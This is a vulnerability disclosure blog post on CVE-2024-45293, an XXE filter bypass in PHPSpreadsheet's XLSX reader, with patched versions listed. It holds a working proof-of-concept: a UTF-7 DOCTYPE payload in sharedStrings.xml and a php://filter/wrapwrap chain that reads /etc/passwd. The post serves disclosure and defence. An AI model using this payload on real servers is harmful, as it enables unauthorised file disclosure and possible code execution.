CVE-2024-45293: XXE in PHPSpreadsheet's Excel parser
25 October 2024
The PHPSpreadsheet library, part of the widely used PHPOffice open-source suite, was discovered to be vulnerable to XML External Entity (XXE) injection. The vulnerability arises from insufficiently strict XXE sanitization filters in the XLSX reader, which is responsible for parsing user-supplied Excel spreadsheets.
Exploitation involves supplying a crafted Excel spreadsheet (XLSX) with an embedded XML file containing a payload. When processed, this payload can reveal sensitive files on servers running applications that depend on this library.
Although a fix for a similar XXE vulnerability was introduced in version 2.2.1, it was not sufficiently robust. This blog presents a bypass for the existing patch and explores the associated impacts.
Affected versions include:
- < 1.29.1
- >= 2.0.0, < 2.1.1
- >= 2.2.0, < 2.3.0
Since PHPSpreadsheet is the successor to the now-unmaintained PHPExcel and is widely adopted, this vulnerability affects a range of applications that use one of the library’s core features: loading XLSX spreadsheets.
The Shaheen research team reported the vulnerability in August; it was later fixed and assigned CVE-2024-45293 on September 13th, 2024.
Background
For this analysis, we used a simple PHP script that leverages the PHPSpreadsheet library to load a file under our control. The file in question is an Excel spreadsheet in XLSX format, which contains our proof-of-concept payload.
The workflow follows standard practice for using PHPSpreadsheet: first, the file is passed to IOFactory’s load method; then the active sheet is retrieved using getActiveSheet; finally, the sheet’s content is read using the getRowIterator/getCellIterator methods.
The application script is as follows:
<?php
require __DIR__ . '/vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;
use PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;
class SpreadsheetReader {
    /**
     * Reads the active worksheet from a spreadsheet file and returns its data.
     *
     * @param string $filePath Path to the spreadsheet file.
     * @return array Cell data (row, column, value) from the active worksheet.
     */
    public function readSpreadsheet(string $filePath): array {
        // Load the spreadsheet
        $spreadsheet = IOFactory::load($filePath);
        // Get the active sheet
        $worksheet = $spreadsheet->getActiveSheet();
        return $this->readWorksheet($worksheet);
    }
    /**
     * Extracts data from the provided worksheet.
     *
     * @param Worksheet $worksheet The worksheet to read.
     * @return array Cell data (row, column, value) from the worksheet.
     */
    public function readWorksheet(Worksheet $worksheet): array {
        $cellData = [];
        foreach ($worksheet->getRowIterator() as $row) {
            $cellIterator = $row->getCellIterator();
            // Skip empty cells
            $cellIterator->setIterateOnlyExistingCells(true);
            foreach ($cellIterator as $cell) {
                $cellData[] = [
                    "Row" => $cell->getRow(),
                    "Column" => $cell->getColumn(),
                    "Value" => $cell->getValue(),
                ];
                // Echo each value as it is read
                print_r($cell->getValue());
            }
        }
        return $cellData;
    }
}
// Example usage
$reader = new SpreadsheetReader();
$filePath = './poc.xlsx';
$data = $reader->readSpreadsheet($filePath);
print_r($data);
The application instantiates the SpreadsheetReader class and then calls its readSpreadsheet method on a file that we provide.
Parsing Excel (XLSX) sheets
public function readSpreadsheet(string $filePath): array {
    // Load the spreadsheet
    $spreadsheet = IOFactory::load($filePath);
    // Get the active sheet
    $worksheet = $spreadsheet->getActiveSheet();
    return $this->readWorksheet($worksheet);
}
The SpreadsheetReader relies on the library’s IOFactory class to load an appropriate reader based on the extension of the file provided.
This is done through IOFactory’s createReaderForFile method: if the user provides a file with a supported extension (such as XLSX), a reader for that specific format is instantiated and subsequently used to load the file via the reader’s load method.
The Details
The loader that handles Excel (XLSX) files is the loadSpreadsheetFromFile method of the Reader\Xlsx class.
Since Excel files are essentially zip archives containing XML files (including the XML-based .rels relationship files), the method makes multiple calls to the loadZip method, which it uses to parse the different files within the spreadsheet.
/**
 * Loads Spreadsheet from file.
 */
protected function loadSpreadsheetFromFile(string $filename): Spreadsheet
{
    File::assertFile($filename, self::INITIAL_FILE);
    // Initialisations
    $excel = new Spreadsheet();
    $excel->removeSheetByIndex(0);
    $addingFirstCellStyleXf = true;
    $addingFirstCellXf = true;
    $unparsedLoadedData = [];
    $this->zip = $zip = new ZipArchive();
    $zip->open($filename);
    // Read the theme first, because we need the colour scheme when reading the styles
    [$workbookBasename, $xmlNamespaceBase] = $this->getWorkbookBaseName();
    $drawingNS = self::REL_TO_DRAWING[$xmlNamespaceBase] ?? Namespaces::DRAWINGML;
    $chartNS = self::REL_TO_CHART[$xmlNamespaceBase] ?? Namespaces::CHART;
    $wbRels = $this->loadZip("xl/_rels/{$workbookBasename}.rels", Namespaces::RELATIONSHIPS);
    ...
    ...
    $rels = $this->loadZip(self::INITIAL_FILE, Namespaces::RELATIONSHIPS);
    ...
    ...
The loadZip method reads a given XML file from the uploaded spreadsheet, parses it using simplexml_load_string, and returns the result as a SimpleXMLElement, as seen in the definition below.
private function loadZip(string $filename, string $ns = '', bool $replaceUnclosedBr = false): SimpleXMLElement
{
    $contents = $this->getFromZipArchive($this->zip, $filename);
    if ($replaceUnclosedBr) {
        $contents = str_replace('<br>', '<br/>', $contents);
    }
    $rels = simplexml_load_string(
        $this->getSecurityScannerOrThrow()->scan($contents),
        'SimpleXMLElement',
        Settings::getLibXmlLoaderOptions(),
        $ns
    );
    return self::testSimpleXml($rels);
}
Before parsing the contents of a file, the method passes them to the scan function for validation. This acts as a safeguard against XML External Entity (XXE) injection, using the following approach on XLSX files in particular:
- Convert the XML to UTF-8 if it is not already UTF-8 encoded.
- If the conversion fails, report the XML as suspicious and abort.
- If the conversion succeeds:
  - Check whether the XML contains the string <!DOCTYPE, which is treated as an indication of a malicious XXE attempt. If the string is found, the parser aborts with an error.
  - Otherwise, parse the file as needed with the relatively safe libxml options LIBXML_DTDLOAD and LIBXML_DTDATTR.
This can be seen in the code snippet below highlighting the scan function:
public function scan($xml): string
{
    $xml = "$xml";
    $xml = $this->toUtf8($xml);
    // Don't rely purely on libxml_disable_entity_loader()
    $pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';
    if (preg_match($pattern, $xml)) {
        throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
    }
    if ($this->callback !== null) {
        $xml = call_user_func($this->callback, $xml);
    }
    return $xml;
}
The $this->pattern property refers to the string <!DOCTYPE.
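To make the check concrete, the following standalone sketch rebuilds the scanner’s pattern the same way scan() does, assuming $this->pattern is '<!DOCTYPE' as stated above. buildScanPattern and asciiToUtf16le are our own hypothetical helpers, not PHPSpreadsheet API. The optional \0 between characters lets the check also match NUL-padded (UTF-16LE-style) input, while a UTF-7-encoded < slips through because the raw bytes never contain the literal string.

```php
<?php
// Hypothetical helper mirroring the pattern construction in scan():
// an optional NUL byte (\0?) is allowed around every character of the needle.
function buildScanPattern(string $needle = '<!DOCTYPE'): string
{
    return '/\\0?' . implode('\\0?', str_split($needle)) . '\\0?/';
}

// Hypothetical helper: UTF-16LE bytes for ASCII text are each byte followed by a NUL.
function asciiToUtf16le(string $ascii): string
{
    return implode('', array_map(fn (string $c): string => $c . "\0", str_split($ascii)));
}

$pattern = buildScanPattern();

// Literal declaration: caught.
$plain = preg_match($pattern, '<!DOCTYPE foo []>') === 1;
// NUL-padded declaration: caught thanks to the optional \0 between characters.
$utf16 = preg_match($pattern, asciiToUtf16le('<!DOCTYPE foo []>')) === 1;
// UTF-7 form of "<": the bytes contain no literal "<!DOCTYPE", so it is not caught.
$utf7 = preg_match($pattern, '+ADw-!DOCTYPE foo []>') === 1;

var_dump($plain, $utf16, $utf7);
```

Running it prints bool(true) twice followed by bool(false).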
The vulnerability - Have some space
This blacklist approach assumes that the UTF-8 conversion always takes place when needed, before the resulting content is checked for the blacklisted string.
Looking at the toUtf8 function, it determines the encoding of the XML content through the findCharSet function.
private function toUtf8(string $xml): string
{
    $charset = $this->findCharSet($xml);
    if ($charset !== 'UTF-8') {
        $xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
        $charset = $this->findCharSet($xml);
        if ($charset !== 'UTF-8') {
            throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
        }
    }
    return $xml;
}
private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding="([^"]*]?)"/',
        "/encoding='([^']*?)'/",
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }
    return 'UTF-8';
}
<?xml version="1.0" encoding="UTF-8"?>
The findCharSet function uses regular expressions to look for the encoding declared in the XML content, such as the encoding="UTF-8" attribute in the declaration above, and returns a default of UTF-8 if neither pattern is found in the input.
If the encoding attribute is matched and it is not UTF-8, the content is converted to UTF-8, as seen in the first if block of the toUtf8 function.
Herein lies the catch: this depends entirely on the regex being a wide enough net to catch every way the encoding can be declared.
$patterns = [
    '/encoding="([^"]*]?)"/',
    "/encoding='([^']*?)'/",
];
These patterns search the scanned content for encoding="…" or encoding='…'; however, they don’t take into account that XML allows whitespace around the = sign in attribute declarations (mainly intended for readability), e.g. encoding ='UTF-7'.
So an XML document with the following declaration:
<?xml version="1.0" encoding ='UTF-7'?>
will not have its contents converted from UTF-7 to UTF-8, because findCharSet fails to match the encoding attribute and therefore defaults to UTF-8. This makes it easy to encode the <!DOCTYPE string in UTF-7, bypassing the security filter, which searches ONLY for the literal <!DOCTYPE, and thus enabling XXE injection.
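The regex gap can be reproduced outside the library. The sketch below copies the two findCharSet patterns quoted above into a standalone function (findCharSetCopy is our own name, not library API) and compares an unspaced declaration with two spaced variants. It then uses mbstring to show that the UTF-7 sequence +ADw-!DOCTYPE decodes to <!DOCTYPE, which is what a UTF-7-aware XML parser sees even though the raw bytes pass the scan.

```php
<?php
// Standalone copy of the two findCharSet() patterns shown above.
function findCharSetCopy(string $xml): string
{
    $patterns = [
        '/encoding="([^"]*]?)"/',
        "/encoding='([^']*?)'/",
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }
    return 'UTF-8'; // fallback when no pattern matches
}

// Without whitespace, the declared charset is detected.
$detected = findCharSetCopy('<?xml version="1.0" encoding=\'UTF-7\'?>');
// Whitespace before or after "=" defeats both patterns, so the charset
// silently falls back to UTF-8 and toUtf8() performs no conversion.
$spacedBefore = findCharSetCopy('<?xml version="1.0" encoding =\'UTF-7\'?>');
$spacedAfter = findCharSetCopy('<?xml version="1.0" encoding= \'UTF-7\' standalone="yes"?>');

// What a parser honouring the UTF-7 declaration reads from these bytes.
$decoded = mb_convert_encoding('+ADw-!DOCTYPE', 'UTF-8', 'UTF-7');

var_dump($detected, $spacedBefore, $spacedAfter, $decoded);
```

The expected results are UTF-7 for the unspaced declaration, UTF-8 (the fallback) for both spaced variants, and <!DOCTYPE for the decoded string. The last line requires the mbstring extension, which the scanner itself already relies on through mb_convert_encoding.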
Excel shared strings
Since external entities are not substituted by default, disclosing information through XXE is more complicated.
We therefore need a way to get the information we aim to disclose reflected back to us. To that end, Excel spreadsheets use what are known as shared strings, a mechanism to save space and reduce redundancy when the file is saved on disk.
This mechanism inventories the strings in the sheet’s cells (so that repeated strings are stored only once), assigns each an index, and stores them in the sharedStrings.xml file. Each cell then holds only the index of its string, ultimately saving space.
The relevant point is that the shared strings file is itself an XML file: we can inject our XXE payload there and have the value we want reflected back through the cells that reference those strings.
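As a rough illustration of the lookup, the sketch below parses a minimal, hand-written sharedStrings.xml with SimpleXML and resolves cells of type s (shared string) through the resulting index table. Both XML snippets are simplified examples written for this illustration, not files produced by Excel; a real reader handles many more cases, such as rich-text runs.

```php
<?php
// Minimal shared strings table: one <si> entry per unique string.
$sharedStringsXml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    . '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2" uniqueCount="1">'
    . '<si><t>hello</t></si>'
    . '</sst>';

// Two worksheet cells, both pointing at shared string index 0 (t="s").
$sheetXml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    . '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData>'
    . '<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>0</v></c></row>'
    . '</sheetData></worksheet>';

// Build the index -> string table from sharedStrings.xml.
$strings = [];
foreach (simplexml_load_string($sharedStringsXml)->si as $si) {
    $strings[] = (string) $si->t;
}

// Resolve each shared-string cell by looking up its index in the table.
$cells = [];
foreach (simplexml_load_string($sheetXml)->sheetData->row as $row) {
    foreach ($row->c as $c) {
        if ((string) $c['t'] === 's') {
            $cells[(string) $c['r']] = $strings[(int) (string) $c->v];
        }
    }
}

print_r($cells);
```

Whatever ends up in a <t> element of sharedStrings.xml, including an expanded entity, is therefore what the cells referencing that index display.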
Disclosing the data - PHP filter wrapper & XML parameter entities
With the filter bypass discovered, we can inject XML entities and have them parsed.
The <!DOCTYPE filter can be bypassed by adding a space when declaring the encoding and using the UTF-7 representation of the < character (+ADw-) that precedes !DOCTYPE.
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>
However, as explained, there are some limitations that one has to work around. For example, external entities won’t resolve because simplexml_load_string is not called with the LIBXML_NOENT flag.
There is a trick that does work, however: using a combination of the PHP filter wrapper and parameter entities, we can define custom entities and then reference them within the XML. This may sound confusing; the example below should clarify the idea.
- Base64-encode the following entity declaration, <!ENTITY internal 'abc'>:
echo "<\!ENTITY internal 'abc' >" | base64
- Then load it as the value of a parameter entity using SYSTEM and the PHP filter wrapper:
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>
When this is run, we can see that the internal entity is created and its value, abc, is used as the value of the shared string.
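The two steps above can be sketched in PHP. This is our own illustration, not part of the original proof-of-concept tooling: it base64-encodes the example declaration, builds the SYSTEM identifier that %xxe; points at, and then reads that same php://filter URI with file_get_contents to show what the parser receives when the parameter entity is expanded. No XML parser is invoked, and default PHP settings (data:// wrapper available) are assumed.

```php
<?php
// Step 1: base64-encode the entity declaration (benign example value "abc").
$entityDecl = "<!ENTITY internal 'abc' >";
$encoded = base64_encode($entityDecl);

// Step 2: the SYSTEM identifier used by the %xxe; parameter entity.
// php://filter with an empty filter list passes the data:// resource through unchanged.
$uri = 'php://filter//resource=data://text/plain;base64,' . $encoded;
$doctype = "+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"{$uri}\" > %xxe;]>";

// Reading the URI directly shows what the parser receives when %xxe; is expanded:
// a declaration that defines &internal; as "abc".
$fetched = file_get_contents($uri);

echo $doctype, PHP_EOL, $fetched, PHP_EOL;
```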
This can be escalated to read local system files using the same PHP filter wrapper!
PHP filters allow us to read any resource on the system that the PHP process can access, and even to apply conversions and encodings to it before retrieval, such as base64 encoding/decoding (including adding prefixes and suffixes, the main source of complexity).
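A quick way to see php://filter applying conversions before data is returned is to chain standard filters over a harmless data:// URI. In this sketch, convert.base64-encode is applied twice, so the result equals base64_encode applied twice, and an encode/decode pair round-trips the input. The wrapwrap chains used later rely on the same chaining mechanism with many more, and more exotic, filters.

```php
<?php
// Filters listed after php://filter/ are applied in order to the resource.
$once = file_get_contents('php://filter/convert.base64-encode/resource=data://text/plain,hello');
$twice = file_get_contents('php://filter/convert.base64-encode/convert.base64-encode/resource=data://text/plain,hello');
// An encode followed by a decode returns the original bytes.
$roundTrip = file_get_contents('php://filter/convert.base64-encode/convert.base64-decode/resource=data://text/plain,hello');

// Expected values: aGVsbG8=, YUdWc2JHOD0=, hello
var_dump($once, $twice, $roundTrip);
```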
We can’t simply read the file and reflect its content directly, however, due to the flags passed to the simplexml_load_string function. We must get a little creative: we have to create an entity whose value is the file contents, so that referencing the entity yields those contents. In other words, the content loaded through the xxe parameter entity should be <!ENTITY _name_ 'RESOURCE CONTENTS'>.
This can be achieved using the PHP filter wrapper’s filter chains, which are described in detail by Synacktiv on their blog and by Charles Fol in the blog post introducing the wrapwrap tool. They are used to add a prefix of <!ENTITY _name_ ' and a suffix of '> around the file contents in order to produce valid XML syntax.
To that end, the wrapwrap script was used to generate the proof-of-concept. It is worth noting that the payload is lengthy: due to length constraints of the simplexml_load_string function, the system literal can only hold roughly 50,000 characters. For comparison, a payload that extracts 54 characters is roughly 35,000 to 50,000 bytes long, depending on the prefix and suffix.
Create the filter chain payload:
python wrapwrap/wrapwrap.py "/etc/passwd" "<\!ENTITY i '" "'>" 54
Sample chain:
php://filter/convert.base64-encode/convert.base64-encode/convert.iconv.855.UTF7/convert.base64-encode/convert.iconv.855.UTF7/conv....
...
...decode/dechunk/convert.base64-decode/convert.base64-decode/resource=/etc/passwd
Prepare the XXE payload:
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "PAYLOAD_GOES_HERE" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&ENTITY_NAME_GOES_HERE;</t></si></sst>
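Filling in the template is plain string substitution. The sketch below uses a hypothetical buildSharedStrings() helper with placeholder arguments: in practice the chain would be the full wrapwrap output from the previous step (elided here, as in the sample above), and the entity name must match the one in the wrapwrap prefix (i in the command above). It then re-checks the result against the two scanner conditions discussed earlier.

```php
<?php
// Hypothetical helper: fill the sharedStrings.xml template shown above.
// The declaration keeps the space after "=" so that findCharSet() cannot match it.
function buildSharedStrings(string $chain, string $entityName): string
{
    return "<?xml version=\"1.0\" encoding= 'UTF-7' standalone=\"yes\"?>\n"
        . "+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"{$chain}\" > %xxe;]>\n"
        . '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">'
        . "<si><t>&{$entityName};</t></si></sst>";
}

// Placeholder chain; substitute the full wrapwrap output here.
$xml = buildSharedStrings('php://filter/.../resource=/etc/passwd', 'i');

// Sanity checks mirroring the scanner: no literal "<!DOCTYPE", and no
// encoding=' or encoding=" sequence for findCharSet() to match.
$hasDoctype = strpos($xml, '<!DOCTYPE') !== false;
$charsetVisible = (bool) preg_match('/encoding=["\']/', $xml);

var_dump($hasDoctype, $charsetVisible);
```

Both checks should print bool(false); the resulting string is what replaces xl/sharedStrings.xml inside the XLSX archive.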
Once the modified sharedStrings.xml file containing the payload is parsed, a portion of the /etc/passwd file is disclosed, confirming a successful XXE attack.
Research such as Charles Fol’s "Iconv, set the charset to RCE" raises the potential impact of this XXE vulnerability from simple disclosure to possible remote code execution (RCE).
Affected Apps
PHPSpreadsheet is used across many PHP projects, including Moodle and Kimai.
Kimai uses PHPSpreadsheet for importing and exporting invoices. This functionality in particular requires admin access to the platform. Once such access is obtained, the vulnerability can be exploited by uploading a crafted XLSX invoice template to trigger the XXE.
This was reported to Kimai and was later fixed in version 2.21.0 alongside the PHPSpreadsheet patch.
Conclusion
Considering the level of adoption PHPSpreadsheet has, it’s important that applications and frameworks using it update to the latest version.